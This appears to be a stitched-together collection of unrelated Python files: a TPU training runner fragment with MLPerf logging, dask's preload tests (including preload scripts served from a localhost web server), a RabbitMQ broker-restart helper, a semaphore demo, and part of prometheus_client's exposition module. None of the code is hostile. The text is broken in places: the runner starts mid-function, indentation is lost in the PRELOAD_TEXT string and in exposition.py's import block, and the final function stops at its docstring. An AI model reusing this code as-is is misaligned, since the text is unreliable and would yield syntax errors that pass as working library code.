    checkpoint_threads = []
    need_join = True
    for i in range(num_threads):
      checkpoint_threads.append(None)

  while cur_step < train_steps:
    start = time.time()
    tf.logging.info("TrainLowLevelRunner: start train step:%d",
                    start_step + cur_step)
    cur_step += self.iterations
    # one session.run executes self.iterations steps on-device
    loss = self.sess.run([self.loss])
    tf.logging.info("TrainLowLevelRunner: sess run loss: %s", loss)
    if num_threads > 0:
      # round-robin over the checkpoint thread slots; wait for the previous
      # occupant of this slot before reusing it
      if checkpoint_threads[thread_id] is not None:
        checkpoint_threads[thread_id].join()
      checkpoint_threads[thread_id] = threading.Thread(
          target=checkpoint_thread_fn, args=(self.saver, self.sess))
      checkpoint_threads[thread_id].start()
      thread_id += 1
      if thread_id >= num_threads:
        thread_id = 0
    end = time.time()
    tf.logging.info(
        "TrainLowLevelRunner: step time {} sec {} examples/sec".format(
            end - start,
            self.iterations * self.hparams.batch_size / (end - start)))

  infeed_thread.join()
  if need_join:
    # only join threads we created ourselves
    for i in range(num_threads):
      if checkpoint_threads[i] is not None:
        checkpoint_threads[i].join()
        checkpoint_threads[i] = None
def predict(self, checkpoint_path=None):
  """Run the predict loop on the TPU device.

  Generator: yields one prediction dict per example, dequeued host-by-host
  via background threads.

  Args:
    checkpoint_path: checkpoint to restore when no training ran in this
      process (defaults to the latest checkpoint in hparams.out_dir).
  """
  if not checkpoint_path:
    checkpoint_path = tf.train.latest_checkpoint(self.hparams.out_dir)
  # iterations == 0 means nothing was trained in-process; restore weights
  if self.iterations == 0:
    self.saver.restore(self.sess, checkpoint_path)

  queue = Queue.Queue()

  def dequeue_thread_fn(sess, dequeue_ops, i):
    # one worker per host: each _ITEM token triggers one outfeed dequeue,
    # _STOP terminates the thread
    while True:
      item = queue.get(block=True)
      if item == _STOP:
        return
      self.predictions[i] = sess.run(dequeue_ops)
      queue.task_done()

  dequeue_threads = [None] * self.num_hosts
  for i in range(self.num_hosts):
    dequeue_threads[i] = threading.Thread(
        target=dequeue_thread_fn, args=(self.sess, self.dequeue_ops[i], i))
    dequeue_threads[i].start()

  for step in range(self.eval_steps):
    tf.logging.info("TrainAndEvalLowLevelRunner: start eval step:%d", step)
    # request one dequeue per host, then wait for all of them to land
    for i in range(self.num_hosts):
      queue.put(_ITEM)
    queue.join()
    # yield per-example prediction dicts from every host's batch
    for j in range(self.num_hosts):
      for i in range(self.hparams.infer_batch_size // self.num_hosts):
        yield {
            key: value[i] for key, value in six.iteritems(self.predictions[j])
        }

  # shut down the dequeue workers
  for i in range(self.num_hosts):
    queue.put(_STOP)
  for i in range(self.num_hosts):
    dequeue_threads[i].join()
def train_and_predict(self):
    """Run the fused train-and-eval loop on the TPU device.

    Starts the compiled train/eval op on one thread and the infeed on
    another, then evaluates BLEU after each epoch until `target_bleu` is
    reached or `max_train_epochs` is exhausted.

    Returns:
      (score, current_step) when eval_steps > 0, else (None, None).
    """
    self.sess.run([self.compile_op])
    # Train and eval thread.
    def train_eval_thread_fn(sess, train_eval_op):
        tf.logging.info("train_eval_op start")
        # Blocks for the whole training run; joined at the end.
        sess.run([train_eval_op])
    train_eval_thread = threading.Thread(
        target=train_eval_thread_fn, args=(self.sess, self.train_eval_op))
    train_eval_thread.start()
    # Infeed thread.
    def infeed_thread_fn(sess, train_enqueue_ops, eval_enqueue_ops, eval_init):
        """Start the infeed."""
        # NOTE(review): fixed 300s wait presumably covers TPU compilation
        # before declaring init done -- confirm against the benchmark rules.
        time.sleep(300)
        mlp_log.mlperf_print("init_stop", None)
        mlp_log.mlperf_print("run_start", None)
        for i in range(self.hparams.max_train_epochs):
            tf.logging.info("Infeed for epoch: %d", i + 1)
            mlp_log.mlperf_print(
                "block_start",
                None,
                metadata={
                    "first_epoch_num": i + 1,
                    "epoch_count": 1
                })
            mlp_log.mlperf_print("epoch_start", None, metadata={"epoch_num": i + 1})
            # Re-initialize the eval dataset, then feed train and eval data.
            sess.run(eval_init)
            sess.run([train_enqueue_ops])
            sess.run([eval_enqueue_ops])
    infeed_thread = threading.Thread(
        target=infeed_thread_fn,
        args=(self.sess, self.enqueue_ops, self.eval_enqueue_ops,
              self.eval_dataset_initializer))
    infeed_thread.start()
    if self.eval_steps > 0:
        eval_state = {"run_success": False, "score": 0.0}
        for epoch in range(self.hparams.max_train_epochs):
            predictions = list(self.predict())
            mlp_log.mlperf_print(
                "eval_start", None, metadata={"epoch_num": epoch + 1})
            current_step = epoch * self.iterations
            eval_state["score"] = metric.get_metric(self.hparams, predictions,
                                                    current_step)
            tf.logging.info("Score after epoch %d: %f", epoch, eval_state["score"])
            mlp_log.mlperf_print(
                "eval_accuracy",
                eval_state["score"],
                metadata={"epoch_num": epoch + 1})
            mlp_log.mlperf_print(
                "eval_stop", None, metadata={"epoch_num": epoch + 1})
            mlp_log.mlperf_print(
                "block_stop",
                None,
                metadata={
                    "first_epoch_num": epoch,
                    "epoch_count": 1
                })
            if eval_state["score"] >= self.hparams.target_bleu:
                eval_state["run_success"] = True
                mlp_log.mlperf_print("run_stop", None, metadata={"status": "success"})
                break
        if not eval_state["run_success"]:
            mlp_log.mlperf_print("run_stop", None, metadata={"status": "abort"})
    infeed_thread.join()
    train_eval_thread.join()
    if self.eval_steps > 0:
        # NOTE(review): current_step is unbound if max_train_epochs == 0
        # while eval_steps > 0 -- confirm that configuration is impossible.
        return eval_state["score"], current_step
    else:
        return None, None
|
test_preload.py | import multiprocessing
import os
import shutil
import sys
import tempfile
import urllib.error
import urllib.request
from textwrap import dedent
from time import sleep
import pytest
import tornado
from tornado import web
import dask
from distributed import Client, Nanny, Scheduler, Worker
from distributed.compatibility import MACOS
from distributed.metrics import time
from distributed.utils_test import captured_logger, cluster, gen_cluster, gen_test
PY_VERSION = sys.version_info[:2]
PRELOAD_TEXT = """
_worker_info = {}
def dask_setup(worker):
_worker_info['address'] = worker.address
def get_worker_address():
return _worker_info['address']
"""
def test_worker_preload_file(loop):
    """A preload script given by file path runs on every worker."""

    def check_worker():
        import worker_info
        return worker_info.get_worker_address()

    workdir = tempfile.mkdtemp()
    try:
        script_path = os.path.join(workdir, "worker_info.py")
        with open(script_path, "w") as fh:
            fh.write(PRELOAD_TEXT)
        with cluster(worker_kwargs={"preload": [script_path]}) as (s, workers), Client(
            s["address"], loop=loop
        ) as client:
            expected = {w["address"]: w["address"] for w in workers}
            assert client.run(check_worker) == expected
    finally:
        shutil.rmtree(workdir)
@gen_test()
async def test_worker_preload_text():
    """Preload passed as source text runs on both scheduler and worker."""
    source = """
def dask_setup(worker):
    worker.foo = 'setup'
"""
    async with Scheduler(dashboard_address=":0", preload=source) as scheduler:
        assert scheduler.foo == "setup"
        async with Worker(scheduler.address, preload=[source]) as worker:
            assert worker.foo == "setup"
@gen_cluster(nthreads=[])
async def test_worker_preload_config(s):
    """Preload configured through dask config runs setup and teardown."""
    source = """
def dask_setup(worker):
    worker.foo = 'setup'
def dask_teardown(worker):
    worker.foo = 'teardown'
"""
    with dask.config.set(
        {"distributed.worker.preload": [source], "distributed.nanny.preload": [source]}
    ):
        async with Nanny(s.address) as nanny:
            assert nanny.foo == "setup"
            async with Client(s.address, asynchronous=True) as client:
                result = await client.run(lambda dask_worker: dask_worker.foo)
                assert result == {nanny.worker_address: "setup"}
        assert nanny.foo == "teardown"
def test_worker_preload_module(loop):
    """A preload importable as a module (via sys.path) runs on every worker."""

    def check_worker():
        import worker_info
        return worker_info.get_worker_address()

    workdir = tempfile.mkdtemp()
    sys.path.insert(0, workdir)
    try:
        with open(os.path.join(workdir, "worker_info.py"), "w") as fh:
            fh.write(PRELOAD_TEXT)
        with cluster(worker_kwargs={"preload": ["worker_info"]}) as (
            s,
            workers,
        ), Client(s["address"], loop=loop) as client:
            expected = {w["address"]: w["address"] for w in workers}
            assert client.run(check_worker) == expected
    finally:
        sys.path.remove(workdir)
        shutil.rmtree(workdir)
@gen_cluster(nthreads=[])
async def test_worker_preload_click(s):
    """Preload may be a click command wrapping dask_setup."""
    source = """
import click
@click.command()
def dask_setup(worker):
    worker.foo = 'setup'
"""
    async with Worker(s.address, preload=source) as worker:
        assert worker.foo == "setup"
@gen_cluster(nthreads=[])
async def test_worker_preload_click_async(s, tmpdir):
    # Ensure we allow for click commands wrapping coroutines
    # https://github.com/dask/distributed/issues/4169
    source = """
import click
@click.command()
async def dask_setup(worker):
    worker.foo = 'setup'
"""
    async with Worker(s.address, preload=source) as worker:
        assert worker.foo == "setup"
@pytest.mark.asyncio
async def test_preload_import_time(cleanup):
    """Preloads run early enough to register a custom comm backend."""
    source = """
from distributed.comm.registry import backends
from distributed.comm.tcp import TCPBackend
backends["foo"] = TCPBackend()
""".strip()
    try:
        async with Scheduler(dashboard_address=":0", preload=source, protocol="foo") as s:
            async with Nanny(s.address, preload=source, protocol="foo") as n:
                async with Client(s.address, asynchronous=True) as c:
                    await c.wait_for_workers(1)
    finally:
        # Undo the registration so later tests see a clean backend table.
        from distributed.comm.registry import backends
        del backends["foo"]
class MyHandler(web.RequestHandler):
    """Serves a minimal scheduler preload script over HTTP."""

    def get(self):
        script = """
def dask_setup(dask_server):
    dask_server.foo = 1
""".strip()
        self.write(script)
def create_preload_application():
    """Serve MyHandler at http://127.0.0.1:12345/preload and block forever.

    Intended to run in a separate process (see the scheduler_preload
    fixture); it never returns because it starts the Tornado IOLoop.
    """
    app = web.Application([(r"/preload", MyHandler)])
    # listen() returns an HTTPServer we never use; the original bound it to
    # an unused local, which has been dropped.
    app.listen(12345, address="127.0.0.1")
    tornado.ioloop.IOLoop.instance().start()
@pytest.fixture
def scheduler_preload():
    """Run the preload web app at 127.0.0.1:12345 for the test's duration."""
    proc = multiprocessing.Process(target=create_preload_application)
    proc.start()
    deadline = time() + 5
    while not proc.is_alive():
        if time() > deadline:
            raise AssertionError("Process didn't come up")
        sleep(0.5)
    # Make sure we can query the server
    req = urllib.request.Request("http://127.0.0.1:12345/preload", method="GET")
    deadline = time() + 10
    while True:
        try:
            if urllib.request.urlopen(req).status == 200:
                break
        except urllib.error.URLError as exc:
            if time() > deadline:
                raise AssertionError("Webserver didn't come up", exc)
        sleep(0.5)
    yield
    proc.kill()
    proc.join(timeout=5)
@pytest.mark.skipif(
    MACOS and PY_VERSION == (3, 7), reason="HTTP Server doesn't come up"
)
@pytest.mark.asyncio
async def test_web_preload(cleanup, scheduler_preload):
    """A preload fetched over HTTP runs on the scheduler and is logged."""
    with captured_logger("distributed.preloading") as log:
        async with Scheduler(
            host="localhost",
            preload=["http://127.0.0.1:12345/preload"],
        ) as scheduler:
            assert scheduler.foo == 1
    assert "12345/preload" in log.getvalue()
@gen_cluster(nthreads=[])
async def test_scheduler_startup(s):
    """A worker preload can set the scheduler address through dask config."""
    source = f"""
import dask
dask.config.set(scheduler_address="{s.address}")
"""
    async with Worker(preload=source) as worker:
        assert worker.scheduler.address == s.address
@gen_cluster(nthreads=[])
async def test_scheduler_startup_nanny(s):
    """A nanny preload can set the scheduler address through dask config."""
    source = f"""
import dask
dask.config.set(scheduler_address="{s.address}")
"""
    async with Nanny(preload_nanny=source) as nanny:
        assert nanny.scheduler.address == s.address
class WorkerPreloadHandler(web.RequestHandler):
    """Serves a minimal worker preload script over HTTP."""

    def get(self):
        script = """
import dask
dask.config.set(scheduler_address="tcp://127.0.0.1:8786")
""".strip()
        self.write(script)
def create_worker_preload_application():
    """Serve WorkerPreloadHandler at http://127.0.0.1:12346/preload forever.

    Intended to run in a separate process (see the worker_preload fixture);
    it never returns because it starts the Tornado IOLoop.
    """
    application = web.Application([(r"/preload", WorkerPreloadHandler)])
    # listen() returns an HTTPServer we never use; the original bound it to
    # an unused local, which has been dropped.
    application.listen(12346, address="127.0.0.1")
    tornado.ioloop.IOLoop.instance().start()
@pytest.fixture
def worker_preload():
    """Run the worker-preload web app at 127.0.0.1:12346 for the test."""
    proc = multiprocessing.Process(target=create_worker_preload_application)
    proc.start()
    deadline = time() + 5
    while not proc.is_alive():
        if time() > deadline:
            raise AssertionError("Process didn't come up")
        sleep(0.5)
    # Make sure we can query the server
    req = urllib.request.Request("http://127.0.0.1:12346/preload", method="GET")
    deadline = time() + 10
    while True:
        try:
            if urllib.request.urlopen(req).status == 200:
                break
        except urllib.error.URLError as exc:
            if time() > deadline:
                raise AssertionError("Webserver didn't come up", exc)
        sleep(0.5)
    yield
    proc.kill()
    proc.join(timeout=5)
@pytest.mark.skipif(
    MACOS and PY_VERSION == (3, 7), reason="HTTP Server doesn't come up"
)
@pytest.mark.asyncio
async def test_web_preload_worker(cleanup, worker_preload):
    """A nanny preload fetched over HTTP points it at the scheduler."""
    async with Scheduler(port=8786, host="localhost") as scheduler:
        async with Nanny(preload_nanny=["http://127.0.0.1:12346/preload"]) as nanny:
            assert nanny.scheduler_addr == scheduler.address
# This test is blocked on https://github.com/dask/distributed/issues/5819
@pytest.mark.xfail(
    reason="The preload argument to the client isn't supported yet", strict=True
)
@gen_cluster(nthreads=[])
async def test_client_preload_text(s: Scheduler):
    """Client preload text should run setup and teardown hooks."""
    script = dedent(
        """\
        def dask_setup(client):
            client.foo = "setup"
        def dask_teardown(client):
            client.foo = "teardown"
        """
    )
    async with Client(address=s.address, asynchronous=True, preload=script) as client:
        assert client.foo == "setup"
    assert client.foo == "teardown"
@gen_cluster(nthreads=[])
async def test_client_preload_config(s):
    """Client preload from dask config runs setup and teardown hooks."""
    script = dedent(
        """\
        def dask_setup(client):
            client.foo = "setup"
        def dask_teardown(client):
            client.foo = "teardown"
        """
    )
    with dask.config.set({"distributed.client.preload": [script]}):
        async with Client(address=s.address, asynchronous=True) as client:
            assert client.foo == "setup"
        assert client.foo == "teardown"
# This test is blocked on https://github.com/dask/distributed/issues/5819
@pytest.mark.xfail(
    reason="The preload argument to the client isn't supported yet", strict=True
)
@gen_cluster(nthreads=[])
async def test_client_preload_click(s):
    """A client preload click command receives preload_argv arguments."""
    script = dedent(
        """\
        import click
        @click.command()
        @click.argument("value")
        def dask_setup(client, value):
            client.foo = value
        """
    )
    expected = "setup"
    async with Client(
        address=s.address, asynchronous=True, preload=script, preload_argv=[[expected]]
    ) as client:
        assert client.foo == expected
@gen_cluster(nthreads=[])
async def test_client_preload_config_click(s):
    """Click preload and its argv can both come from dask config."""
    script = dedent(
        """\
        import click
        @click.command()
        @click.argument("value")
        def dask_setup(client, value):
            client.foo = value
        """
    )
    expected = "setup"
    config = {
        "distributed.client.preload": [script],
        "distributed.client.preload-argv": [[expected]],
    }
    with dask.config.set(config):
        async with Client(address=s.address, asynchronous=True) as client:
            assert client.foo == expected
|
BrokerActions.py | import sys
import io
import subprocess
import threading
import time
import uuid
import os.path
import requests
import json
from random import randint
from UniqueConfiguration import UniqueConfiguration
from CommonConfiguration import CommonConfiguration
from printer import console_out
class BrokerActions:
    """Runtime actions against deployed message brokers: polling message
    counts, restarting nodes (all, or one per configuration), and helper
    lookups via bash scripts plus the RabbitMQ management HTTP API."""

    def __init__(self, deployer):
        # Outcome of each restart, keyed by f"{technology}{node}" ->
        # "success" | "failed"; written from worker threads.
        self._action_status = dict()
        self._deployer = deployer
        # Tag prepended to every console_out() line from this class.
        self.actor = "BROKER_ACTIONS"

    def wait_for_msg_trigger(self, configurations, common_conf, trigger_at):
        """Block until each configuration's node reports at least
        `trigger_at` messages, polling the management API every 10s."""
        # iterate over configurations
        for config_tag in configurations:
            unique_conf_list = configurations[config_tag]
            # iterate over configurations
            for p in range(len(unique_conf_list)):
                unique_conf = unique_conf_list[p]
                console_out(self.actor, f"Checking message total on node {unique_conf.node_number}")
                broker_ip = self.get_broker_ip(unique_conf.technology, unique_conf.node_number, common_conf.run_tag, common_conf.key_pair)
                msg_total = 0
                while(msg_total < trigger_at):
                    msg_total = self.get_cluster_message_total(broker_ip, common_conf.username, common_conf.password)
                    console_out(self.actor, f"Trigger at {trigger_at}. Currently {msg_total} messages on node {unique_conf.node_number}")
                    time.sleep(10)
                console_out(self.actor, f"Reached msg trigger on node {unique_conf.node_number}")

    def restart_all_brokers(self, configurations, common_conf):
        """Restart every node of every configuration in parallel, then tear
        everything down if any restart failed (unless no_deploy is set)."""
        r_threads = list()
        for config_tag in configurations:
            console_out(self.actor, f"BROKER RESTART FOR configuration {config_tag}")
            unique_conf_list = configurations[config_tag]
            # iterate over configurations
            for p in range(len(unique_conf_list)):
                unique_conf = unique_conf_list[p]
                # iterate over nodes of this configuration
                for n in range(unique_conf.cluster_size):
                    node = int(unique_conf.node_number) + n
                    restart = threading.Thread(target=self.restart_broker, args=(unique_conf.technology, str(node), common_conf.run_tag, common_conf.key_pair,))
                    r_threads.append(restart)
        # Start all restarts at once, then wait for every one to finish.
        for rt in r_threads:
            rt.start()
        for rt in r_threads:
            rt.join()
        # Inspect the per-node outcomes recorded by restart_broker().
        for config_tag in configurations:
            unique_conf_list = configurations[config_tag]
            for p in range(len(unique_conf_list)):
                unique_conf = unique_conf_list[p]
                for n in range(unique_conf.cluster_size):
                    node = int(unique_conf.node_number) + n
                    status_id = f"{unique_conf.technology}{node}"
                    if self._action_status[status_id] != "success":
                        console_out(self.actor, f"Broker restart failed for node {unique_conf.technology}{node}")
                        if not common_conf.no_deploy:
                            self._deployer.teardown_all(configurations, common_conf.run_tag, False)

    def restart_one_broker(self, configurations, common_conf):
        """Restart only the first node of each configuration in parallel,
        tearing everything down on failure (unless no_deploy is set)."""
        r_threads = list()
        for config_tag in configurations:
            console_out(self.actor, f"BROKER RESTART FOR configuration {config_tag}")
            unique_conf_list = configurations[config_tag]
            # iterate over configurations
            for p in range(len(unique_conf_list)):
                unique_conf = unique_conf_list[p]
                restart = threading.Thread(target=self.restart_broker, args=(unique_conf.technology, str(unique_conf.node_number), common_conf.run_tag, common_conf.key_pair,))
                r_threads.append(restart)
        for rt in r_threads:
            rt.start()
        for rt in r_threads:
            rt.join()
        # Inspect the per-node outcomes recorded by restart_broker().
        for config_tag in configurations:
            unique_conf_list = configurations[config_tag]
            for p in range(len(unique_conf_list)):
                unique_conf = unique_conf_list[p]
                status_id = f"{unique_conf.technology}{unique_conf.node_number}"
                if self._action_status[status_id] != "success":
                    console_out(self.actor, f"Broker restart failed for node {unique_conf.technology}{unique_conf.node_number}")
                    if not common_conf.no_deploy:
                        self._deployer.teardown_all(configurations, common_conf.run_tag, False)

    def restart_broker(self, technology, node, run_tag, key_pair):
        """Run restart-broker.sh for one node and record success/failure in
        self._action_status (thread target)."""
        status_id = technology + node
        exit_code = subprocess.call(["bash", "restart-broker.sh",
                                     key_pair,
                                     node,
                                     run_tag,
                                     technology])
        if exit_code != 0:
            console_out(self.actor, f"Restart of broker on node {node} failed with exit code {exit_code}")
            self._action_status[status_id] = "failed"
        else:
            self._action_status[status_id] = "success"

    def restart_one_broker_repeat(self, *args, **kwargs):
        raise NotImplementedError

    def get_broker_ip(self, technology, node, run_tag, key_pair):
        """Resolve a broker's IP via get_broker_ip.sh, retrying up to 3
        times (5s apart). Returns "" if no IP could be obtained."""
        broker_ip = ""
        attempts = 0
        while broker_ip == "" and attempts < 3:
            attempts += 1
            process = subprocess.Popen(["bash", "get_broker_ip.sh",
                                        key_pair,
                                        node,
                                        run_tag,
                                        technology], stdout=subprocess.PIPE)
            # Scan script output for the BROKER_IP=... marker line.
            for line in io.TextIOWrapper(process.stdout, encoding="utf-8"):
                if not line:
                    break
                if line.startswith("BROKER_IP="):
                    broker_ip = line.rstrip().replace("BROKER_IP=","")
                    break
            if broker_ip == "":
                time.sleep(5)
        return broker_ip

    def get_cluster_message_total(self, broker_ip, username, password):
        """Return the cluster-wide queued message count from the RabbitMQ
        management API overview endpoint (0 when not reported)."""
        res = requests.get(f"http://{broker_ip}:15672/api/overview",
                           auth=(username,password))
        overview_json = res.json()
        queue_totals = overview_json["queue_totals"]
        if "messages" in queue_totals:
            return queue_totals["messages"]
        else:
            return 0
test.py | from threading import Thread, Semaphore
from time import sleep
# Classic two-thread rendezvous: each thread announces its arrival by
# releasing its own semaphore, then waits on the other's.
aArrived = Semaphore(0)
bArrived = Semaphore(0)


def aBody():
    """Thread A: signal arrival, then wait for B before proceeding."""
    aArrived.release()
    print('a at rendezvous')
    bArrived.acquire()
    print('a past rendezvous')


def bBody():
    """Thread B: signal arrival, then wait for A before proceeding."""
    bArrived.release()
    print('b at rendezvous')
    aArrived.acquire()
    print('b past rendezvous')


thread_a = Thread(target=aBody)
thread_a.start()
sleep(1)  # force thread A to block
thread_b = Thread(target=bBody)
thread_b.start()
exposition.py | #!/usr/bin/python
from __future__ import unicode_literals
import base64
import os
import socket
import sys
import threading
from contextlib import closing
from wsgiref.simple_server import WSGIRequestHandler, make_server
from prometheus_client import core
from prometheus_client.openmetrics import exposition as openmetrics
try:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
from urllib2 import build_opener, Request, HTTPHandler
from urllib import quote_plus
from urlparse import parse_qs, urlparse
except ImportError:
# Python 3
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.request import build_opener, Request, HTTPHandler
from urllib.parse import quote_plus, parse_qs, urlparse
CONTENT_TYPE_LATEST = str('text/plain; version=0.0.4; charset=utf-8')
'''Content type of the latest text format'''
PYTHON26_OR_OLDER = sys.version_info < (2, 7)
def make_wsgi_app(registry=core.REGISTRY):
    '''Create a WSGI app which serves the metrics from a registry.'''

    def prometheus_app(environ, start_response):
        # Optional ?name[]=... query parameters restrict the exposed metrics.
        query = parse_qs(environ.get('QUERY_STRING', ''))
        encoder, content_type = choose_encoder(environ.get('HTTP_ACCEPT'))
        reg = registry
        if 'name[]' in query:
            reg = reg.restricted_registry(query['name[]'])
        body = encoder(reg)
        start_response(str('200 OK'), [(str('Content-type'), content_type)])
        return [body]

    return prometheus_app
class _SilentHandler(WSGIRequestHandler):
    """WSGI handler that does not log requests."""

    def log_message(self, format, *args):
        """Log nothing."""
        # Intentionally empty: suppresses the default per-request stderr log.
def start_wsgi_server(port, addr='', registry=core.REGISTRY):
    """Starts a WSGI server for prometheus metrics as a daemon thread."""
    httpd = make_server(addr, port, make_wsgi_app(registry),
                        handler_class=_SilentHandler)
    server_thread = threading.Thread(target=httpd.serve_forever)
    # Daemon thread: must not keep the process alive on shutdown.
    server_thread.daemon = True
    server_thread.start()
def generate_latest(registry=core.REGISTRY):
    '''Returns the metrics from the registry in latest text format as a string.

    The output is the classic Prometheus 0.0.4 text format, UTF-8 encoded
    bytes; OpenMetrics-only metric types and samples are munged into their
    closest Prometheus equivalents.
    '''

    def sample_line(s):
        # Render one sample as: name{labels} value [timestamp_ms]
        if s.labels:
            labelstr = '{{{0}}}'.format(','.join(
                ['{0}="{1}"'.format(
                    k, v.replace('\\', r'\\').replace('\n', r'\n').replace('"', r'\"'))
                 for k, v in sorted(s.labels.items())]))
        else:
            labelstr = ''
        timestamp = ''
        if s.timestamp is not None:
            # Convert to milliseconds.
            timestamp = ' {0:d}'.format(int(float(s.timestamp) * 1000))
        return '{0}{1} {2}{3}\n'.format(
            s.name, labelstr, core._floatToGoString(s.value), timestamp)

    output = []
    for metric in registry.collect():
        mname = metric.name
        mtype = metric.type
        # Munging from OpenMetrics into Prometheus format.
        if mtype == 'counter':
            mname = mname + '_total'
        elif mtype == 'info':
            mname = mname + '_info'
            mtype = 'gauge'
        elif mtype == 'stateset':
            mtype = 'gauge'
        elif mtype == 'gaugehistogram':
            # A gauge histogram is really a gauge,
            # but this captures the structure better.
            mtype = 'histogram'
        elif mtype == 'unknown':
            mtype = 'untyped'
        output.append('# HELP {0} {1}\n'.format(
            mname, metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
        output.append('# TYPE {0} {1}\n'.format(mname, mtype))
        om_samples = {}
        for s in metric.samples:
            for suffix in ['_created', '_gsum', '_gcount']:
                if s.name == metric.name + suffix:
                    # OpenMetrics specific sample, put in a gauge at the end.
                    om_samples.setdefault(suffix, []).append(sample_line(s))
                    break
            else:
                output.append(sample_line(s))
        # Emit the deferred OpenMetrics-only samples as gauges.
        for suffix, lines in sorted(om_samples.items()):
            output.append('# TYPE {0}{1} gauge\n'.format(metric.name, suffix))
            output.extend(lines)
    return ''.join(output).encode('utf-8')
def choose_encoder(accept_header):
    '''Pick an (encoder, content_type) pair based on the HTTP Accept header.

    Returns the OpenMetrics encoder when the client accepts
    'application/openmetrics-text'; otherwise the classic text format.
    '''
    for accepted in (accept_header or '').split(','):
        media_type = accepted.split(';')[0].strip()
        if media_type == 'application/openmetrics-text':
            return (openmetrics.generate_latest,
                    openmetrics.CONTENT_TYPE_LATEST)
    return (generate_latest, CONTENT_TYPE_LATEST)
class MetricsHandler(BaseHTTPRequestHandler):
    """HTTP handler that gives metrics from ``core.REGISTRY``."""
    # Class attribute so factory() can build subclasses bound to another
    # registry without touching instances.
    registry = core.REGISTRY

    def do_GET(self):
        # Serve metrics: honour Accept-based encoder choice and optional
        # ?name[]= filtering of the registry.
        registry = self.registry
        params = parse_qs(urlparse(self.path).query)
        encoder, content_type = choose_encoder(self.headers.get('Accept'))
        if 'name[]' in params:
            registry = registry.restricted_registry(params['name[]'])
        try:
            output = encoder(registry)
        except:
            # Report the failure to the client, then re-raise for visibility.
            self.send_error(500, 'error generating metric output')
            raise
        self.send_response(200)
        self.send_header('Content-Type', content_type)
        self.end_headers()
        self.wfile.write(output)

    def log_message(self, format, *args):
        """Log nothing."""

    @staticmethod
    def factory(registry):
        """Returns a dynamic MetricsHandler class tied
        to the passed registry.
        """
        # This implementation relies on MetricsHandler.registry
        # (defined above and defaulted to core.REGISTRY).
        # As we have unicode_literals, we need to create a str()
        # object for type().
        cls_name = str('MetricsHandler')
        MyMetricsHandler = type(cls_name, (MetricsHandler, object),
                                {"registry": registry})
        return MyMetricsHandler
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
    """Thread per request HTTP server."""
    # ThreadingMixIn dispatches each request on its own thread, so one slow
    # scrape cannot block other scrapers.
def start_http_server(port, addr='', registry=core.REGISTRY):
    """Starts an HTTP server for prometheus metrics as a daemon thread"""
    handler_cls = MetricsHandler.factory(registry)
    httpd = _ThreadingSimpleServer((addr, port), handler_cls)
    server_thread = threading.Thread(target=httpd.serve_forever)
    # Daemon thread: must not keep the process alive on shutdown.
    server_thread.daemon = True
    server_thread.start()
def write_to_textfile(path, registry):
    '''Write metrics to the given path.

    This is intended for use with the Node exporter textfile collector.
    The path must end in .prom for the textfile collector to process it.'''
    # Write to a unique sibling file first, then atomically move it into
    # place so the collector never reads a half-written file.
    tmppath = '{0}.{1}.{2}'.format(
        path, os.getpid(), threading.current_thread().ident)
    with open(tmppath, 'wb') as f:
        f.write(generate_latest(registry))
    # rename(2) is atomic.
    os.rename(tmppath, path)
def default_handler(url, method, timeout, headers, data):
    '''Default handler that implements HTTP/HTTPS connections.

    Used by the push_to_gateway functions. Can be re-used by other handlers.'''

    def handle():
        req = Request(url, data=data)
        req.get_method = lambda: method
        for name, value in headers:
            req.add_header(name, value)
        response = build_opener(HTTPHandler).open(req, timeout=timeout)
        if response.code >= 400:
            raise IOError("error talking to pushgateway: {0} {1}".format(
                response.code, response.msg))

    return handle
def basic_auth_handler(url, method, timeout, headers, data, username=None, password=None):
    '''Handler that implements HTTP/HTTPS connections with Basic Auth.

    Sets auth headers using supplied 'username' and 'password', if set.
    Used by the push_to_gateway functions. Can be re-used by other handlers.'''

    def handle():
        '''Perform the request, adding an Authorization header when both
        username and password are provided.'''
        if username is not None and password is not None:
            credentials = '{0}:{1}'.format(username, password).encode('utf-8')
            headers.append(['Authorization',
                            b'Basic ' + base64.b64encode(credentials)])
        default_handler(url, method, timeout, headers, data)()

    return handle
def push_to_gateway(
        gateway, job, registry, grouping_key=None, timeout=30,
        handler=default_handler):
    '''Push metrics to the given pushgateway via HTTP PUT.

    This overwrites all metrics with the same job and grouping_key.

    `gateway` -- pushgateway url, either 'http://pushgateway.local' or
        'pushgateway.local' (scheme defaults to 'http').
    `job` -- job label attached to all pushed metrics.
    `registry` -- an instance of CollectorRegistry.
    `grouping_key` -- see the pushgateway documentation; defaults to None.
    `timeout` -- seconds before the push attempt is aborted; None means
        no timeout.
    `handler` -- optional callable performing the request to the gateway.
        It is invoked as handler(url=..., method=..., timeout=...,
        headers=..., data=...), where `headers` is a list of
        ("header-name", "header-value") tuples and `data` the HTTP body,
        and must return a zero-argument callable that raises (e.g. IOError)
        on failure. The default carries out a plain HTTP/HTTPS request; it
        may be replaced to add SSL client certificates, other auth
        mechanisms, etc.
    '''
    _use_gateway('PUT', gateway, job, registry, grouping_key, timeout, handler)
def pushadd_to_gateway(
        gateway, job, registry, grouping_key=None, timeout=30,
        handler=default_handler):
    '''PushAdd metrics to the given pushgateway via HTTP POST.

    This replaces metrics with the same name, job and grouping_key.

    `gateway` -- pushgateway url, either 'http://pushgateway.local' or
        'pushgateway.local' (scheme defaults to 'http').
    `job` -- job label attached to all pushed metrics.
    `registry` -- an instance of CollectorRegistry.
    `grouping_key` -- see the pushgateway documentation; defaults to None.
    `timeout` -- seconds before the push attempt is aborted; None means
        no timeout.
    `handler` -- optional callable performing the request; see the
        'prometheus_client.push_to_gateway' documentation for the
        implementation requirements.
    '''
    _use_gateway('POST', gateway, job, registry, grouping_key, timeout, handler)
def delete_from_gateway(
        gateway, job, grouping_key=None, timeout=30, handler=default_handler):
    '''Delete metrics from the given pushgateway via HTTP DELETE.

    This deletes metrics with the given job and grouping_key.

    `gateway` -- pushgateway url, either 'http://pushgateway.local' or
        'pushgateway.local' (scheme defaults to 'http').
    `job` -- job label of the metrics to delete.
    `grouping_key` -- see the pushgateway documentation; defaults to None.
    `timeout` -- seconds before the delete attempt is aborted; None means
        no timeout.
    `handler` -- optional callable performing the request; see the
        'prometheus_client.push_to_gateway' documentation for the
        implementation requirements.
    '''
